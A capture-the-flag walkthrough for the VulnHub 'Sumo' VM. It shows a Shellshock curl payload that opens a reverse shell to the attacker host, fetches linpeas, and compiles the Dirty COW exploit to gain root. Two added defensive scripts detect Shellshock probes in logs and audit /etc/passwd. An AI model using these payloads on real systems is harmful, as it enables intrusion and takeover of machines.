https://www.vulnhub.com/entry/sumo-1,480/
System Info
- Ubuntu 12.04 LTS
Discover Target Network
sudo nmap -sn 192.168.122.0-255
nmap -p- 192.168.122.113
Port 80
- not much to see on the website, other than that it is running Apache 2.2.22
ShellShock
https://www.sevenlayers.com/index.php/125-exploiting-shellshock
- use
nikto -host 192.168.122.113
to scan for web server vulnerabilities. It shows that
/cgi-bin/test
/cgi-bin/test.sh
/cgi-bin/test/test.cgi
are vulnerable to Shellshock.
- running:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.122.101/7741 0>&1' http://192.168.122.113/cgi-bin/test/test.cgi
opens a reverse shell over TCP to the host on port 7741.
- upgrade to a better shell using python2
python -c 'import pty;pty.spawn("/bin/bash")'
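A defender-side check for the same weakness, as an added example that is not part of the walkthrough or of the linked article: it scans Apache combined-format access-log lines for the `() { ... };` function-definition prefix that Shellshock probes carry in a header (User-Agent, Referer or the request line), and lists which CGI paths were hit, which is the list of scripts to patch or remove. The log lines are constructed samples, and the regexes, function names and the `Hit` record are my own choices, not anything from the page.

```python
import re
from typing import NamedTuple

# Constructed sample of Apache "combined" access-log lines (assumption: not taken from the
# VM or the walkthrough). Two requests carry a Shellshock probe; the others are ordinary traffic.
SAMPLE_LOG = '''\
192.168.122.50 - - [10/Mar/2024:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.122.101 - - [10/Mar/2024:12:00:05 +0000] "GET /cgi-bin/test/test.cgi HTTP/1.1" 200 0 "-" "() { :; }; echo vulnerable"
192.168.122.101 - - [10/Mar/2024:12:00:09 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 200 0 "() { ignored; }; echo x" "curl/7.29"
192.168.122.51 - - [10/Mar/2024:12:01:00 +0000] "GET /about.html HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0)"
'''

# A Shellshock probe starts with an empty function definition "() { ... };" so that a vulnerable
# bash, importing the header as an environment variable, goes on to run whatever follows the "}".
# Spacing varies between tools, so whitespace is optional everywhere.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


class Hit(NamedTuple):
    ip: str
    timestamp: str
    request: str
    field: str      # which logged field carried the payload: "ua", "referer" or "request"
    payload: str


def parse_combined(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(lines):
    """Return one Hit per log line whose UA, Referer or request line contains a Shellshock probe."""
    hits = []
    for line in lines:
        rec = parse_combined(line.rstrip("\n"))
        if rec is None:
            continue
        for field in ("ua", "referer", "request"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append(Hit(rec["ip"], rec["ts"], rec["request"], field, rec[field]))
                break  # one hit per line is enough for triage
    return hits


def targeted_cgi_paths(hits):
    """Distinct request paths that received a probe: the CGI scripts to patch or remove."""
    paths = set()
    for h in hits:
        parts = h.request.split()
        if len(parts) >= 2:
            paths.add(parts[1])
    return sorted(paths)


if __name__ == "__main__":
    hits = find_shellshock_attempts(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"{h.timestamp} {h.ip} {h.request} via {h.field}: {h.payload}")
    print("probed CGI paths:", targeted_cgi_paths(hits))
```

Point the script at a real access log with `find_shellshock_attempts(open("/var/log/apache2/access.log"))`; any line that does not match the combined format is skipped rather than failing the scan, so a log with a custom `LogFormat` would need the regex adjusted.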
Privilege Escalation
- we are a very low-privileged user, and there is not much misconfiguration to see.
- we can try running enumeration scripts like
linpeas.sh
, but the target machine doesn't have cURL.
- download it onto the host machine with
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
- open a simple HTTP server using python3
python -m http.server 9999
- on the target machine, fetch it into /tmp:
cd /tmp
wget http://192.168.122.101:9999/linpeas.sh && chmod +x linpeas.sh
Dirty COW
- running it shows that this kernel, 3.2.0, is vulnerable to multiple exploits; the CVE we are going to exploit is CVE-2016-5195, which allows local users to gain privileges through incorrect handling of the copy-on-write feature, letting them write to read-only memory mappings. It is known as “Dirty COW”.
- the exploit we are going to use is https://github.com/firefart/dirtycow
- get it onto the host machine with
wget https://github.com/firefart/dirtycow/raw/master/dirty.c
- it has to be cross-compiled for the target system or compiled on the target system.
- so get it onto the target machine the same way as
linpeas.sh
- but if we try to compile using the GNU C compiler on the target system, we get an error like:
Gcc error: gcc: error trying to exec 'cc1': execvp: No such file or directory
- locate
cc1
with
find / -name cc1 2> /dev/null
- add the directory that contains it to the PATH environment variable (the directory, not the cc1 file itself, since gcc's execvp searches PATH for a directory holding cc1):
export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/4.6
- now we can compile it using
gcc -pthread dirty.c -O2 -o dirty -lcrypt
- running it will prompt us for a new password for the new user; enter anything.
- now we can SSH into the machine again with
ssh firefart@192.168.122.113
- even though our username is
firefart
, if we run
id
, it shows that we are root!
Capture the Flag
cat /root/root.txt
Cleaning Up
- because it replaced the target system's
/etc/passwd
file, to clean up we need to restore it with
mv /tmp/passwd.bak /etc/passwd
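A defender-side check for the artifact this privilege escalation leaves behind, as an added example that is not part of the walkthrough or of the dirtycow project: it parses /etc/passwd and flags the signs described above (a UID 0 account that is not root, a password hash stored directly in passwd rather than in /etc/shadow, a missing root entry), and diffs the live file against the /tmp/passwd.bak backup so the restore can be verified. The two passwd texts are constructed samples; their exact shape after the exploit is an assumption, and the hash value is a placeholder.

```python
import sys
from typing import NamedTuple

# Constructed /etc/passwd contents before the exploit (assumption; not captured from the VM).
SAMPLE_BACKUP = '''\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sumo:x:1000:1000:sumo,,,:/home/sumo:/bin/bash
'''

# The same file after the root line has been overwritten with a new UID 0 user that carries
# its password hash inline (assumed shape; $6$PLACEHOLDER... is not a real hash).
SAMPLE_CURRENT = '''\
firefart:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:0:0:firefart:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sumo:x:1000:1000:sumo,,,:/home/sumo:/bin/bash
'''


class Entry(NamedTuple):
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd(5) text into Entry records; a malformed line raises instead of being skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(f)}")
        entries.append(Entry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6]))
    return entries


def audit_passwd(entries):
    """Return human-readable findings for the traces a passwd overwrite of this kind leaves."""
    findings = []
    seen = set()
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 account other than root")
        # "x" means the hash lives in /etc/shadow; "*", "" and "!..." mark locked or no-login accounts.
        if e.passwd not in ("x", "*", "") and not e.passwd.startswith("!"):
            findings.append(f"{e.name}: password hash stored in /etc/passwd instead of /etc/shadow")
        if e.name in seen:
            findings.append(f"{e.name}: duplicate username")
        seen.add(e.name)
    if not any(e.name == "root" and e.uid == 0 for e in entries):
        findings.append("root: UID 0 entry named root is missing")
    return findings


def compare_with_backup(current, backup):
    """Usernames added, removed or changed between the live file and the backup copy."""
    cur = {e.name: e for e in current}
    bak = {e.name: e for e in backup}
    return {
        "added": sorted(set(cur) - set(bak)),
        "removed": sorted(set(bak) - set(cur)),
        "changed": sorted(n for n in set(cur) & set(bak) if cur[n] != bak[n]),
    }


def main(argv):
    # Usage: script.py [/etc/passwd [/tmp/passwd.bak]]; with no arguments, the constructed samples are used.
    if len(argv) > 1:
        with open(argv[1]) as fh:
            current = parse_passwd(fh.read())
        backup = None
        if len(argv) > 2:
            with open(argv[2]) as fh:
                backup = parse_passwd(fh.read())
    else:
        current, backup = parse_passwd(SAMPLE_CURRENT), parse_passwd(SAMPLE_BACKUP)
    for finding in audit_passwd(current):
        print("FINDING:", finding)
    if backup is not None:
        print("diff vs backup:", compare_with_backup(current, backup))


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python3 script.py /etc/passwd /tmp/passwd.bak` on the target before and after the `mv` above: before the restore it reports the extra UID 0 user and the missing root line, and after it the findings list should be empty and the diff should show nothing added or removed.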